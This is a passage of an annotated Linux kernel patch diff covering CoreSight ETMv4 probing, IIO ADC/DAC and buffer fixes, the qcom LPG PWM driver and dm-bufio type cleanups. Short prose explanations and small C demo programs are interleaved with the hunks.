++	for (i = 0; i < drvdata->nr_addr_cmp * 2; i++) {
+ 		etm4x_relaxed_write64(csa, config->addr_val[i], TRCACVRn(i));
+ 		etm4x_relaxed_write64(csa, config->addr_acc[i], TRCACATRn(i));
+ 	}
+@@ -1010,25 +1010,21 @@ static bool etm4_init_iomem_access(struct etmv4_drvdata *drvdata,
+ 				   struct csdev_access *csa)
+ {
+ 	u32 devarch = readl_relaxed(drvdata->base + TRCDEVARCH);
+-	u32 idr1 = readl_relaxed(drvdata->base + TRCIDR1);
+ 
+ 	/*
+ 	 * All ETMs must implement TRCDEVARCH to indicate that
+-	 * the component is an ETMv4. To support any broken
+-	 * implementations we fall back to TRCIDR1 check, which
+-	 * is not really reliable.
++	 * the component is an ETMv4. Even though TRCIDR1 also
++	 * contains the information, it is part of the "Trace"
++	 * register and must be accessed over MMIO with the OSLK
++	 * cleared. But we cannot touch the OSLK until we are
++	 * sure this is an ETM. So rely only on the TRCDEVARCH.
+ 	 */
+-	if ((devarch & ETM_DEVARCH_ID_MASK) == ETM_DEVARCH_ETMv4x_ARCH) {
+-		drvdata->arch = etm_devarch_to_arch(devarch);
+-	} else {
+-		pr_warn("CPU%d: ETM4x incompatible TRCDEVARCH: %x, falling back to TRCIDR1\n",
+-			smp_processor_id(), devarch);
+-
+-		if (ETM_TRCIDR1_ARCH_MAJOR(idr1) != ETM_TRCIDR1_ARCH_ETMv4)
+-			return false;
+-		drvdata->arch = etm_trcidr_to_arch(idr1);
++	if ((devarch & ETM_DEVARCH_ID_MASK) != ETM_DEVARCH_ETMv4x_ARCH) {
++		pr_warn_once("TRCDEVARCH doesn't match ETMv4 architecture\n");
++		return false;
+ 	}
+ 
++	drvdata->arch = etm_devarch_to_arch(devarch);
+ 	*csa = CSDEV_ACCESS_IOMEM(drvdata->base);
+ 	return true;
+ }
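After this change the probe trusts TRCDEVARCH alone: if the architected-ID field does not identify an ETMv4, the device is rejected instead of falling back to the unreliable TRCIDR1 path. A minimal model of such a mask-and-compare check (the mask and expected value below are invented, not the real register encoding):

#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Illustrative field layout: bits [31:12] hold the architecture ID. */
#define DEVARCH_ID_MASK   0xFFFFF000u
#define DEVARCH_ETMv4     0x47724000u	/* made-up expected ID */

static bool is_etmv4(uint32_t devarch)
{
	/* Reject anything whose architected ID does not match. */
	return (devarch & DEVARCH_ID_MASK) == DEVARCH_ETMv4;
}

int main(void)
{
	printf("%d %d\n", is_etmv4(0x47724abc), is_etmv4(0x12345678));
	return 0;
}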
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x.h b/drivers/hwtracing/coresight/coresight-etm4x.h
+index 4b21bb79f1682..0174fbf1a9637 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x.h
++++ b/drivers/hwtracing/coresight/coresight-etm4x.h
+@@ -753,14 +753,12 @@
+  * TRCDEVARCH	- CoreSight architected register
+  *                - Bits[15:12] - Major version
+  *                - Bits[19:16] - Minor version
+- * TRCIDR1	- ETM architected register
+- *                - Bits[11:8] - Major version
+- *                - Bits[7:4]  - Minor version
+- * We must rely on TRCDEVARCH for the version information,
+- * however we don't want to break the support for potential
+- * old implementations which might not implement it. Thus
+- * we fall back to TRCIDR1 if TRCDEVARCH is not implemented
+- * for memory mapped components.
++ *
++ * We must rely only on TRCDEVARCH for the version information. Even though
++ * TRCIDR1 also provides the architecture version, it is a "Trace" register
++ * and as such must be accessed only with Trace power domain ON. This may
++ * not be available at probe time.
++ *
+  * Now to make certain decisions easier based on the version
+  * we use an internal representation of the version in the
+  * driver, as follows :
+@@ -786,12 +784,6 @@ static inline u8 etm_devarch_to_arch(u32 devarch)
+ 				ETM_DEVARCH_REVISION(devarch));
+ }
+ 
+-static inline u8 etm_trcidr_to_arch(u32 trcidr1)
+-{
+-	return ETM_ARCH_VERSION(ETM_TRCIDR1_ARCH_MAJOR(trcidr1),
+-				ETM_TRCIDR1_ARCH_MINOR(trcidr1));
+-}
+-
+ enum etm_impdef_type {
+ 	ETM4_IMPDEF_HISI_CORE_COMMIT,
+ 	ETM4_IMPDEF_FEATURE_MAX,
+diff --git a/drivers/iio/adc/ad7791.c b/drivers/iio/adc/ad7791.c
+index fee8d129a5f08..86effe8501b44 100644
+--- a/drivers/iio/adc/ad7791.c
++++ b/drivers/iio/adc/ad7791.c
+@@ -253,7 +253,7 @@ static const struct ad_sigma_delta_info ad7791_sigma_delta_info = {
+ 	.has_registers = true,
+ 	.addr_shift = 4,
+ 	.read_mask = BIT(3),
+-	.irq_flags = IRQF_TRIGGER_LOW,
++	.irq_flags = IRQF_TRIGGER_FALLING,
+ };
+ 
+ static int ad7791_read_raw(struct iio_dev *indio_dev,
+diff --git a/drivers/iio/adc/ltc2497.c b/drivers/iio/adc/ltc2497.c
+index 556f10dfb5023..e1e14f5d237d2 100644
+--- a/drivers/iio/adc/ltc2497.c
++++ b/drivers/iio/adc/ltc2497.c
+@@ -28,7 +28,6 @@ struct ltc2497_driverdata {
+ 	struct ltc2497core_driverdata common_ddata;
+ 	struct i2c_client *client;
+ 	u32 recv_size;
+-	u32 sub_lsb;
+ 	/*
+ 	 * DMA (thus cache coherency maintenance) may require the
+ 	 * transfer buffers to live in their own cache lines.
+@@ -65,10 +64,10 @@ static int ltc2497_result_and_measure(struct ltc2497core_driverdata *ddata,
+ 		 * equivalent to a sign extension.
+ 		 */
+ 		if (st->recv_size == 3) {
+-			*val = (get_unaligned_be24(st->data.d8) >> st->sub_lsb)
++			*val = (get_unaligned_be24(st->data.d8) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		} else {
+-			*val = (be32_to_cpu(st->data.d32) >> st->sub_lsb)
++			*val = (be32_to_cpu(st->data.d32) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		}
+ 
+@@ -122,7 +121,6 @@ static int ltc2497_probe(struct i2c_client *client,
+ 	st->common_ddata.chip_info = chip_info;
+ 
+ 	resolution = chip_info->resolution;
+-	st->sub_lsb = 31 - (resolution + 1);
+ 	st->recv_size = BITS_TO_BYTES(resolution) + 1;
+ 
+ 	return ltc2497core_probe(dev, indio_dev);
+diff --git a/drivers/iio/adc/qcom-spmi-adc5.c b/drivers/iio/adc/qcom-spmi-adc5.c
+index 821fee60a7651..d1b86570768a9 100644
+--- a/drivers/iio/adc/qcom-spmi-adc5.c
++++ b/drivers/iio/adc/qcom-spmi-adc5.c
+@@ -626,12 +626,20 @@ static int adc5_get_fw_channel_data(struct adc5_chip *adc,
+ 				    struct fwnode_handle *fwnode,
+ 				    const struct adc5_data *data)
+ {
+-	const char *name = fwnode_get_name(fwnode), *channel_name;
++	const char *channel_name;
++	char *name;
+ 	u32 chan, value, varr[2];
+ 	u32 sid = 0;
+ 	int ret;
+ 	struct device *dev = adc->dev;
+ 
++	name = devm_kasprintf(dev, GFP_KERNEL, "%pfwP", fwnode);
++	if (!name)
++		return -ENOMEM;
++
++	/* Cut the address part */
++	name[strchrnul(name, '@') - name] = '\0';
++
+ 	ret = fwnode_property_read_u32(fwnode, "reg", &chan);
+ 	if (ret) {
+ 		dev_err(dev, "invalid channel number %s\n", name);
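The probe now builds the channel name with devm_kasprintf() and truncates it at the first '@' so the unit address does not end up in the label; strchrnul() returns a pointer to the terminating NUL when no '@' exists, making the write a harmless no-op in that case. A portable C equivalent (strchrnul() is a GNU extension, so a local version is defined for self-containment):

#include <stdio.h>

/* Like GNU strchrnul(): pointer to the first 'c', or to the trailing NUL. */
static char *strchrnul_(char *s, int c)
{
	while (*s && *s != c)
		s++;
	return s;
}

static void cut_unit_address(char *name)
{
	/* "adc-chan@600" -> "adc-chan"; names without '@' are untouched. */
	name[strchrnul_(name, '@') - name] = '\0';
}

int main(void)
{
	char a[] = "adc-chan@600", b[] = "vph-pwr";

	cut_unit_address(a);
	cut_unit_address(b);
	printf("%s %s\n", a, b);
	return 0;
}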
+diff --git a/drivers/iio/adc/ti-ads7950.c b/drivers/iio/adc/ti-ads7950.c
+index 2cc9a9bd9db60..263fc3a1b87e1 100644
+--- a/drivers/iio/adc/ti-ads7950.c
++++ b/drivers/iio/adc/ti-ads7950.c
+@@ -634,6 +634,7 @@ static int ti_ads7950_probe(struct spi_device *spi)
+ 	st->chip.label = dev_name(&st->spi->dev);
+ 	st->chip.parent = &st->spi->dev;
+ 	st->chip.owner = THIS_MODULE;
++	st->chip.can_sleep = true;
+ 	st->chip.base = -1;
+ 	st->chip.ngpio = TI_ADS7950_NUM_GPIOS;
+ 	st->chip.get_direction = ti_ads7950_get_direction;
+diff --git a/drivers/iio/dac/cio-dac.c b/drivers/iio/dac/cio-dac.c
+index 791dd999cf291..18a64f72fc188 100644
+--- a/drivers/iio/dac/cio-dac.c
++++ b/drivers/iio/dac/cio-dac.c
+@@ -66,8 +66,8 @@ static int cio_dac_write_raw(struct iio_dev *indio_dev,
+ 	if (mask != IIO_CHAN_INFO_RAW)
+ 		return -EINVAL;
+ 
+-	/* DAC can only accept up to a 16-bit value */
+-	if ((unsigned int)val > 65535)
++	/* DAC can only accept up to a 12-bit value */
++	if ((unsigned int)val > 4095)
+ 		return -EINVAL;
+ 
+ 	priv->chan_out_states[chan->channel] = val;
+diff --git a/drivers/iio/imu/Kconfig b/drivers/iio/imu/Kconfig
+index f1d7d4b5e2224..c2f97629e9cdb 100644
+--- a/drivers/iio/imu/Kconfig
++++ b/drivers/iio/imu/Kconfig
+@@ -47,6 +47,7 @@ config ADIS16480
+ 	depends on SPI
+ 	select IIO_ADIS_LIB
+ 	select IIO_ADIS_LIB_BUFFER if IIO_BUFFER
++	select CRC32
+ 	help
+ 	  Say yes here to build support for Analog Devices ADIS16375, ADIS16480,
+ 	  ADIS16485, ADIS16488 inertial sensors.
+diff --git a/drivers/iio/industrialio-buffer.c b/drivers/iio/industrialio-buffer.c
+index 228598b82a2f3..7e7ee307a3f7d 100644
+--- a/drivers/iio/industrialio-buffer.c
++++ b/drivers/iio/industrialio-buffer.c
+@@ -203,24 +203,27 @@ static ssize_t iio_buffer_write(struct file *filp, const char __user *buf,
+ 				break;
+ 			}
+ 
++			if (filp->f_flags & O_NONBLOCK) {
++				if (!written)
++					ret = -EAGAIN;
++				break;
++			}
++
+ 			wait_woken(&wait, TASK_INTERRUPTIBLE,
+ 					MAX_SCHEDULE_TIMEOUT);
+ 			continue;
+ 		}
+ 
+ 		ret = rb->access->write(rb, n - written, buf + written);
+-		if (ret == 0 && (filp->f_flags & O_NONBLOCK))
+-			ret = -EAGAIN;
++		if (ret < 0)
++			break;
+ 
+-		if (ret > 0) {
+-			written += ret;
+-			if (written != n && !(filp->f_flags & O_NONBLOCK))
+-				continue;
+-		}
+-	} while (ret == 0);
++		written += ret;
++
++	} while (written != n);
+ 	remove_wait_queue(&rb->pollq, &wait);
+ 
+-	return ret < 0 ? ret : n;
++	return ret < 0 ? ret : written;
+ }
+ 
+ /**
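The reworked write loop has a clearer contract: in non-blocking mode it fails with -EAGAIN only if nothing has been written yet, otherwise it reports the partial count; in blocking mode it keeps waiting until everything is consumed or an error occurs. A userspace C model of that partial-write accounting (the sink callback and demo numbers are invented):

#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

/* Consume up to n bytes; returns bytes taken, 0 if full, <0 on error. */
typedef long (*sink_fn)(const char *buf, size_t n);

static long buffered_write(sink_fn sink, const char *buf, size_t n,
			   bool nonblock)
{
	size_t written = 0;
	long ret = 0;

	do {
		ret = sink(buf + written, n - written);
		if (ret < 0)
			break;
		if (ret == 0) {		/* no room right now */
			if (nonblock) {
				if (!written)
					ret = -EAGAIN;
				break;
			}
			continue;	/* a real driver would sleep here */
		}
		written += ret;
	} while (written != n);

	return ret < 0 ? ret : (long)written;
}

static long demo_sink(const char *buf, size_t n)
{
	(void)buf;
	return n > 4 ? 4 : (long)n;	/* accepts at most 4 bytes per call */
}

int main(void)
{
	long r = buffered_write(demo_sink, "hello world", 11, true);

	printf("wrote %ld bytes\n", r);
	return 0;
}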
+diff --git a/drivers/iio/light/cm32181.c b/drivers/iio/light/cm32181.c
+index b1674a5bfa368..d4a34a3bf00d9 100644
+--- a/drivers/iio/light/cm32181.c
++++ b/drivers/iio/light/cm32181.c
+@@ -429,6 +429,14 @@ static const struct iio_info cm32181_info = {
+ 	.attrs			= &cm32181_attribute_group,
+ };
+ 
++static void cm32181_unregister_dummy_client(void *data)
++{
++	struct i2c_client *client = data;
++
++	/* Unregister the dummy client */
++	i2c_unregister_device(client);
++}
++
+ static int cm32181_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+@@ -460,6 +468,10 @@ static int cm32181_probe(struct i2c_client *client)
+ 		client = i2c_acpi_new_device(dev, 1, &board_info);
+ 		if (IS_ERR(client))
+ 			return PTR_ERR(client);
++
++		ret = devm_add_action_or_reset(dev, cm32181_unregister_dummy_client, client);
++		if (ret)
++			return ret;
+ 	}
+ 
+ 	cm32181 = iio_priv(indio_dev);
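Registering the dummy I2C client with devm_add_action_or_reset() ties its lifetime to the device, so the client is unregistered automatically on any later probe failure or on unbind. The shape of that pattern, modeled in plain C with a tiny LIFO cleanup stack standing in for the devres list (all names are illustrative):

#include <stdio.h>
#include <stdlib.h>

typedef void (*cleanup_fn)(void *data);

struct cleanup { cleanup_fn fn; void *data; };
static struct cleanup stack[8];
static int depth;

/* Register a cleanup; on failure run it immediately (the "_or_reset" part). */
static int add_action_or_reset(cleanup_fn fn, void *data)
{
	if (depth == 8) {
		fn(data);	/* could not register: undo right away */
		return -1;
	}
	stack[depth++] = (struct cleanup){ fn, data };
	return 0;
}

static void run_cleanups(void)
{
	while (depth) {		/* LIFO, like devres */
		struct cleanup *c = &stack[--depth];
		c->fn(c->data);
	}
}

static void free_client(void *data)
{
	printf("unregistering dummy client %p\n", data);
	free(data);
}

int main(void)
{
	void *client = malloc(16);

	if (add_action_or_reset(free_client, client))
		return 1;
	run_cleanups();	/* happens automatically on probe failure/unbind */
	return 0;
}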
+diff --git a/drivers/leds/rgb/leds-qcom-lpg.c b/drivers/leds/rgb/leds-qcom-lpg.c
+index c1a56259226fb..f1c2419334e6f 100644
+--- a/drivers/leds/rgb/leds-qcom-lpg.c
++++ b/drivers/leds/rgb/leds-qcom-lpg.c
+@@ -972,8 +972,8 @@ out_unlock:
+ 	return ret;
+ }
+ 
+-static void lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+-			      struct pwm_state *state)
++static int lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
++			     struct pwm_state *state)
+ {
+ 	struct lpg *lpg = container_of(chip, struct lpg, pwm);
+ 	struct lpg_channel *chan = &lpg->channels[pwm->hwpwm];
+@@ -986,20 +986,20 @@ static void lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	ret = regmap_read(lpg->map, chan->base + LPG_SIZE_CLK_REG, &val);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	refclk = lpg_clk_rates[val & PWM_CLK_SELECT_MASK];
+ 	if (refclk) {
+ 		ret = regmap_read(lpg->map, chan->base + LPG_PREDIV_CLK_REG, &val);
+ 		if (ret)
+-			return;
++			return 0;
+ 
+ 		pre_div = lpg_pre_divs[FIELD_GET(PWM_FREQ_PRE_DIV_MASK, val)];
+ 		m = FIELD_GET(PWM_FREQ_EXP_MASK, val);
+ 
+ 		ret = regmap_bulk_read(lpg->map, chan->base + PWM_VALUE_REG, &pwm_value, sizeof(pwm_value));
+ 		if (ret)
+-			return;
++			return 0;
+ 
+ 		state->period = DIV_ROUND_UP_ULL((u64)NSEC_PER_SEC * LPG_RESOLUTION * pre_div * (1 << m), refclk);
+ 		state->duty_cycle = DIV_ROUND_UP_ULL((u64)NSEC_PER_SEC * pwm_value * pre_div * (1 << m), refclk);
+@@ -1010,13 +1010,15 @@ static void lpg_pwm_get_state(struct pwm_chip *chip, struct pwm_device *pwm,
+ 
+ 	ret = regmap_read(lpg->map, chan->base + PWM_ENABLE_CONTROL_REG, &val);
+ 	if (ret)
+-		return;
++		return 0;
+ 
+ 	state->enabled = FIELD_GET(LPG_ENABLE_CONTROL_OUTPUT, val);
+ 	state->polarity = PWM_POLARITY_NORMAL;
+ 
+ 	if (state->duty_cycle > state->period)
+ 		state->duty_cycle = state->period;
++
++	return 0;
+ }
+ 
+ static const struct pwm_ops lpg_pwm_ops = {
+diff --git a/drivers/md/dm-bio-prison-v1.c b/drivers/md/dm-bio-prison-v1.c
+index 1f8f98efd97a0..138067abe14b7 100644
+--- a/drivers/md/dm-bio-prison-v1.c
++++ b/drivers/md/dm-bio-prison-v1.c
+@@ -285,14 +285,14 @@ EXPORT_SYMBOL_GPL(dm_cell_promote_or_release);
+ 
+ struct dm_deferred_entry {
+ 	struct dm_deferred_set *ds;
+-	unsigned count;
++	unsigned int count;
+ 	struct list_head work_items;
+ };
+ 
+ struct dm_deferred_set {
+ 	spinlock_t lock;
+-	unsigned current_entry;
+-	unsigned sweeper;
++	unsigned int current_entry;
++	unsigned int sweeper;
+ 	struct dm_deferred_entry entries[DEFERRED_SET_SIZE];
+ };
+ 
+@@ -338,7 +338,7 @@ struct dm_deferred_entry *dm_deferred_entry_inc(struct dm_deferred_set *ds)
+ }
+ EXPORT_SYMBOL_GPL(dm_deferred_entry_inc);
+ 
+-static unsigned ds_next(unsigned index)
++static unsigned int ds_next(unsigned int index)
+ {
+ 	return (index + 1) % DEFERRED_SET_SIZE;
+ }
+@@ -373,7 +373,7 @@ EXPORT_SYMBOL_GPL(dm_deferred_entry_dec);
+ int dm_deferred_set_add_work(struct dm_deferred_set *ds, struct list_head *work)
+ {
+ 	int r = 1;
+-	unsigned next_entry;
++	unsigned int next_entry;
+ 
+ 	spin_lock_irq(&ds->lock);
+ 	if ((ds->sweeper == ds->current_entry) &&
+diff --git a/drivers/md/dm-bio-prison-v2.c b/drivers/md/dm-bio-prison-v2.c
+index 9dec3b61cf70a..0cc0d13c40e51 100644
+--- a/drivers/md/dm-bio-prison-v2.c
++++ b/drivers/md/dm-bio-prison-v2.c
+@@ -148,7 +148,7 @@ static bool __find_or_insert(struct dm_bio_prison_v2 *prison,
+ 
+ static bool __get(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct bio *inmate,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell)
+@@ -171,7 +171,7 @@ static bool __get(struct dm_bio_prison_v2 *prison,
+ 
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+@@ -224,7 +224,7 @@ EXPORT_SYMBOL_GPL(dm_cell_put_v2);
+ 
+ static int __lock(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -255,7 +255,7 @@ static int __lock(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -291,7 +291,7 @@ EXPORT_SYMBOL_GPL(dm_cell_quiesce_v2);
+ 
+ static int __promote(struct dm_bio_prison_v2 *prison,
+ 		     struct dm_bio_prison_cell_v2 *cell,
+-		     unsigned new_lock_level)
++		     unsigned int new_lock_level)
+ {
+ 	if (!cell->exclusive_lock)
+ 		return -EINVAL;
+@@ -302,7 +302,7 @@ static int __promote(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level)
++			    unsigned int new_lock_level)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/dm-bio-prison-v2.h b/drivers/md/dm-bio-prison-v2.h
+index 6e04234268db3..5a7d996bbbd80 100644
+--- a/drivers/md/dm-bio-prison-v2.h
++++ b/drivers/md/dm-bio-prison-v2.h
+@@ -44,8 +44,8 @@ struct dm_cell_key_v2 {
+ struct dm_bio_prison_cell_v2 {
+ 	// FIXME: pack these
+ 	bool exclusive_lock;
+-	unsigned exclusive_level;
+-	unsigned shared_count;
++	unsigned int exclusive_level;
++	unsigned int shared_count;
+ 	struct work_struct *quiesce_continuation;
+ 
+ 	struct rb_node node;
+@@ -86,7 +86,7 @@ void dm_bio_prison_free_cell_v2(struct dm_bio_prison_v2 *prison,
+  */
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+@@ -114,7 +114,7 @@ bool dm_cell_put_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+ 
+@@ -132,7 +132,7 @@ void dm_cell_quiesce_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level);
++			    unsigned int new_lock_level);
+ 
+ /*
+  * Adds any held bios to the bio list.
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 19caaf684ee34..382c5cc471952 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -89,7 +89,7 @@ struct dm_bufio_client {
+ 	unsigned long n_buffers[LIST_SIZE];
+ 
+ 	struct block_device *bdev;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	s8 sectors_per_block_bits;
+ 	void (*alloc_callback)(struct dm_buffer *);
+ 	void (*write_callback)(struct dm_buffer *);
+@@ -98,9 +98,9 @@ struct dm_bufio_client {
+ 	struct dm_io_client *dm_io;
+ 
+ 	struct list_head reserved_buffers;
+-	unsigned need_reserved_buffers;
++	unsigned int need_reserved_buffers;
+ 
+-	unsigned minimum_buffers;
++	unsigned int minimum_buffers;
+ 
+ 	struct rb_root buffer_tree;
+ 	wait_queue_head_t free_buffer_wait;
+@@ -145,14 +145,14 @@ struct dm_buffer {
+ 	unsigned char list_mode;		/* LIST_* */
+ 	blk_status_t read_error;
+ 	blk_status_t write_error;
+-	unsigned accessed;
+-	unsigned hold_count;
++	unsigned int accessed;
++	unsigned int hold_count;
+ 	unsigned long state;
+ 	unsigned long last_accessed;
+-	unsigned dirty_start;
+-	unsigned dirty_end;
+-	unsigned write_start;
+-	unsigned write_end;
++	unsigned int dirty_start;
++	unsigned int dirty_end;
++	unsigned int write_start;
++	unsigned int write_end;
+ 	struct dm_bufio_client *c;
+ 	struct list_head write_list;
+ 	void (*end_io)(struct dm_buffer *, blk_status_t);
+@@ -220,7 +220,7 @@ static unsigned long global_num = 0;
+ /*
+  * Buffers are freed after this timeout
+  */
+-static unsigned dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
++static unsigned int dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
+ static unsigned long dm_bufio_retain_bytes = DM_BUFIO_DEFAULT_RETAIN_BYTES;
+ 
+ static unsigned long dm_bufio_peak_allocated;
+@@ -438,7 +438,7 @@ static void *alloc_buffer_data(struct dm_bufio_client *c, gfp_t gfp_mask,
+ 	 * as if GFP_NOIO was specified.
+ 	 */
+ 	if (gfp_mask & __GFP_NORETRY) {
+-		unsigned noio_flag = memalloc_noio_save();
++		unsigned int noio_flag = memalloc_noio_save();
+ 		void *ptr = __vmalloc(c->block_size, gfp_mask);
+ 
+ 		memalloc_noio_restore(noio_flag);
+@@ -591,7 +591,7 @@ static void dmio_complete(unsigned long error, void *context)
+ }
+ 
+ static void use_dmio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		     unsigned n_sectors, unsigned offset)
++		     unsigned int n_sectors, unsigned int offset)
+ {
+ 	int r;
+ 	struct dm_io_request io_req = {
+@@ -629,11 +629,11 @@ static void bio_complete(struct bio *bio)
+ }
+ 
+ static void use_bio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		    unsigned n_sectors, unsigned offset)
++		    unsigned int n_sectors, unsigned int offset)
+ {
+ 	struct bio *bio;
+ 	char *ptr;
+-	unsigned vec_size, len;
++	unsigned int vec_size, len;
+ 
+ 	vec_size = b->c->block_size >> PAGE_SHIFT;
+ 	if (unlikely(b->c->sectors_per_block_bits < PAGE_SHIFT - SECTOR_SHIFT))
+@@ -654,7 +654,7 @@ dmio:
+ 	len = n_sectors << SECTOR_SHIFT;
+ 
+ 	do {
+-		unsigned this_step = min((unsigned)(PAGE_SIZE - offset_in_page(ptr)), len);
++		unsigned int this_step = min((unsigned int)(PAGE_SIZE - offset_in_page(ptr)), len);
+ 		if (!bio_add_page(bio, virt_to_page(ptr), this_step,
+ 				  offset_in_page(ptr))) {
+ 			bio_put(bio);
+@@ -684,9 +684,9 @@ static inline sector_t block_to_sector(struct dm_bufio_client *c, sector_t block
+ static void submit_io(struct dm_buffer *b, enum req_op op,
+ 		      void (*end_io)(struct dm_buffer *, blk_status_t))
+ {
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 	sector_t sector;
+-	unsigned offset, end;
++	unsigned int offset, end;
+ 
+ 	b->end_io = end_io;
+ 
+@@ -1156,7 +1156,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+ EXPORT_SYMBOL_GPL(dm_bufio_new);
+ 
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks)
++		       sector_t block, unsigned int n_blocks)
+ {
+ 	struct blk_plug plug;
+ 
+@@ -1232,7 +1232,7 @@ void dm_bufio_release(struct dm_buffer *b)
+ EXPORT_SYMBOL_GPL(dm_bufio_release);
+ 
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end)
++					unsigned int start, unsigned int end)
+ {
+ 	struct dm_bufio_client *c = b->c;
+ 
+@@ -1529,13 +1529,13 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_forget_buffers);
+ 
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n)
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n)
+ {
+ 	c->minimum_buffers = n;
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_minimum_buffers);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c)
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c)
+ {
+ 	return c->block_size;
+ }
+@@ -1734,15 +1734,15 @@ static unsigned long dm_bufio_shrink_count(struct shrinker *shrink, struct shrin
+ /*
+  * Create the buffering interface
+  */
+-struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-					       unsigned reserved_buffers, unsigned aux_size,
++struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++					       unsigned int reserved_buffers, unsigned int aux_size,
+ 					       void (*alloc_callback)(struct dm_buffer *),
+ 					       void (*write_callback)(struct dm_buffer *),
+ 					       unsigned int flags)
+ {
+ 	int r;
+ 	struct dm_bufio_client *c;
+-	unsigned i;
++	unsigned int i;
+ 	char slab_name[27];
+ 
+ 	if (!block_size || block_size & ((1 << SECTOR_SHIFT) - 1)) {
+@@ -1796,7 +1796,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 
+ 	if (block_size <= KMALLOC_MAX_SIZE &&
+ 	    (block_size < PAGE_SIZE || !is_power_of_2(block_size))) {
+-		unsigned align = min(1U << __ffs(block_size), (unsigned)PAGE_SIZE);
++		unsigned int align = min(1U << __ffs(block_size), (unsigned int)PAGE_SIZE);
+ 		snprintf(slab_name, sizeof slab_name, "dm_bufio_cache-%u", block_size);
+ 		c->slab_cache = kmem_cache_create(slab_name, block_size, align,
+ 						  SLAB_RECLAIM_ACCOUNT, NULL);
+@@ -1872,7 +1872,7 @@ EXPORT_SYMBOL_GPL(dm_bufio_client_create);
+  */
+ void dm_bufio_client_destroy(struct dm_bufio_client *c)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	drop_buffers(c);
+ 
+@@ -1920,9 +1920,9 @@ void dm_bufio_set_sector_offset(struct dm_bufio_client *c, sector_t start)
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_sector_offset);
+ 
+-static unsigned get_max_age_hz(void)
++static unsigned int get_max_age_hz(void)
+ {
+-	unsigned max_age = READ_ONCE(dm_bufio_max_age);
++	unsigned int max_age = READ_ONCE(dm_bufio_max_age);
+ 
+ 	if (max_age > UINT_MAX / HZ)
+ 		max_age = UINT_MAX / HZ;
+@@ -1973,7 +1973,7 @@ static void do_global_cleanup(struct work_struct *w)
